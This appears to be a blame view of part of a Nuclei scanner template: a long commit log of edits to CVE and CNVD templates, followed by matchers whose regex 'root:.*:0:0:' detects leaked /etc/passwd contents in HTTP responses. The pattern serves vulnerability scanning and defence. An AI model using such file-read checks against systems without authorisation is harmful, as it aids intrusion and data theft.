cves/2017/CVE-2017-3881.yaml by mp * Enhancement: cves/2017/CVE-2017-7269.yaml by mp * Enhancement: cves/2017/CVE-2017-8917.yaml by mp * Enhancement: cves/2017/CVE-2017-9791.yaml by mp * Enhancement: cves/2015/CVE-2015-1427.yaml by mp * Enhancement: cves/2017/CVE-2017-12149.yaml by mp * Enhancement: cves/2017/CVE-2017-12542.yaml by mp * Enhancement: cves/2017/CVE-2017-8917.yaml by mp * Spacing and other minor issues * Update CVE-2015-1427.yaml * Update CVE-2017-12149.yaml * Update CVE-2017-12542.yaml * Update CVE-2017-12635.yaml * Update CVE-2017-14135.yaml * Update CVE-2017-3881.yaml * Update CVE-2017-7269.yaml * Update CVE-2017-8917.yaml * Update CVE-2017-9791.yaml * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-32204.yaml by mp * Enhancement: cnvd/2020/CNVD-2020-68596.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-09650.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-26422.yaml by mp * Enhancement: cnvd/2022/CNVD-2022-03672.yaml by mp * Enhancement: cves/2017/CVE-2017-9841.yaml by mp * Enhancement: cves/2018/CVE-2018-0127.yaml by mp * Enhancement: cves/2018/CVE-2018-1000226.yaml by mp * Enhancement: cves/2018/CVE-2018-1000861.yaml by mp * Enhancement: cves/2018/CVE-2018-10562.yaml by mp * Enhancement: cves/2018/CVE-2018-12031.yaml by mp * Enhancement: cves/2018/CVE-2018-1207.yaml by mp * Enhancement: cves/2018/CVE-2018-12634.yaml by mp * Enhancement: cves/2018/CVE-2018-1273.yaml by mp * Enhancement: cves/2018/CVE-2018-16763.yaml by mp * Enhancement: cves/2018/CVE-2018-16167.yaml by mp * Enhancement: cves/2018/CVE-2018-14916.yaml by mp * Enhancement: cves/2018/CVE-2018-14064.yaml by mp * Enhancement: cves/2018/CVE-2018-13379.yaml by mp * Enhancement: cves/2017/CVE-2017-9841.yaml by mp * Enhancement: cves/2018/CVE-2018-1000861.yaml by mp * Enhancement: cves/2018/CVE-2018-10562.yaml by mp * Enhancement: cves/2018/CVE-2018-12031.yaml by mp * Enhancement: cves/2018/CVE-2018-1207.yaml by mp * Enhancement: cves/2018/CVE-2018-12634.yaml by mp * Enhancement: cves/2018/CVE-2018-13379.yaml by mp * Enhancement: cves/2018/CVE-2018-14916.yaml by mp * Enhancement: cves/2018/CVE-2018-16167.yaml by mp * Enhancement: cves/2018/CVE-2018-16763.yaml by mp * Cleanup and spacing * Remove blank cve-id lines * Enhancement: cves/2018/CVE-2018-16836.yaml by mp * Enhancement: cves/2018/CVE-2018-17246.yaml by mp * Enhancement: cves/2018/CVE-2018-17431.yaml by mp * Enhancement: cves/2018/CVE-2018-18925.yaml by mp * Enhancement: cves/2018/CVE-2018-20985.yaml by mp * Enhancement: cves/2018/CVE-2018-2894.yaml by mp * Enhancement: cves/2018/CVE-2018-3810.yaml by mp * Enhancement: cves/2018/CVE-2018-7600.yaml by mp * Enhancement: cves/2018/CVE-2018-7600.yaml by mp * Enhancement: cves/2018/CVE-2018-7602.yaml by mp * Enhancement: cves/2018/CVE-2018-9161.yaml by mp * Enhancement: cves/2018/CVE-2018-16836.yaml by mp * Enhancement: cves/2018/CVE-2018-17431.yaml by mp * Many title clean-ups for more standardization. Some vendor name clean-up * Enhancement: cves/2018/CVE-2018-20985.yaml by mp * Enhancement: cves/2018/CVE-2018-3810.yaml by mp * Spacing issues * Remove 2 blank newlines * Enhancement: vulnerabilities/other/tamronos-rce.yaml by cs * Enhancement: cves/2018/CVE-2018-9845.yaml by mp * Enhancement: cves/2018/CVE-2018-9995.yaml by mp * Enhancement: cves/2019/CVE-2019-0230.yaml by mp * Enhancement: cves/2019/CVE-2019-16920.yaml by mp * Enhancement: cves/2019/CVE-2019-17270.yaml by mp * Enhancement: cves/2019/CVE-2019-17382.yaml by mp * Enhancement: cves/2019/CVE-2019-17444.yaml by mp * Enhancement: cves/2019/CVE-2019-17506.yaml by mp * Enhancement: cves/2020/CVE-2020-10148.yaml by mp * Enhancement: cves/2020/CVE-2020-11710.yaml by mp * Enhancement: cves/2020/CVE-2020-11854.yaml by mp * Enhancement: cves/2020/CVE-2020-12800.yaml by mp * Enhancement: cves/2020/CVE-2020-13117.yaml by mp * Enhancement: cves/2020/CVE-2020-13167.yaml by mp * Enhancement: cves/2020/CVE-2020-13927.yaml by mp * Enhancement: cves/2020/CVE-2020-13942.yaml by mp * Spacing, syntax error * Spacing, correct this time. * Enhancement: cves/2020/CVE-2020-15920.yaml by mp * Enhancement: cves/2020/CVE-2020-29227.yaml by mp * Enhancement: cves/2021/CVE-2021-24499.yaml by mp * Enhancement: cves/2021/CVE-2021-24762.yaml by mp * Enhancement: cves/2018/CVE-2018-9995.yaml by mp * Enhancement: cves/2019/CVE-2019-0230.yaml by mp * Enhancement: cves/2019/CVE-2019-17444.yaml by mp * Enhancement: cves/2020/CVE-2020-10148.yaml by mp * Enhancement: cves/2020/CVE-2020-11854.yaml by mp * Enhancement: cves/2020/CVE-2020-13167.yaml by mp * Enhancement: cves/2020/CVE-2020-13927.yaml by mp * Enhancement: cves/2020/CVE-2020-15920.yaml by mp * Enhancement: cves/2021/CVE-2021-24499.yaml by mp * Extra newlines and one sp;acing issue * Update CVE-2018-9995.yaml * Update CVE-2019-0230.yaml * Update CVE-2019-16920.yaml * Update CVE-2019-17270.yaml * Update CVE-2019-17382.yaml * Update CVE-2019-17444.yaml * Update CVE-2019-17506.yaml * Update CVE-2020-10148.yaml * Update CVE-2020-11710.yaml * Update CVE-2020-11854.yaml * Update CVE-2020-12800.yaml * Update CVE-2020-13167.yaml * Update CVE-2020-13927.yaml * Update CVE-2020-13942.yaml * Update CVE-2020-15920.yaml * Update CVE-2020-29227.yaml * Update CVE-2021-24499.yaml * Update CVE-2021-24762.yaml Co-authored-by: sullo <sullo@cirt.net> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io>
2022-05-17 09:11:26 +00:00
part: body
2021-04-18 14:02:04 +00:00
regex:
- "root:.*:0:0:"
2021-04-18 14:02:04 +00:00
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022031bfe9cd8e82454f0dc7dcdded8aa48bf382fb39898265096cd404d18282e3ad022100b739a8abb5d6881bacd066079132a648b6fe00d9d2833bfbe4814531f75981e8:922c64590222798bb761d5b6d8e72950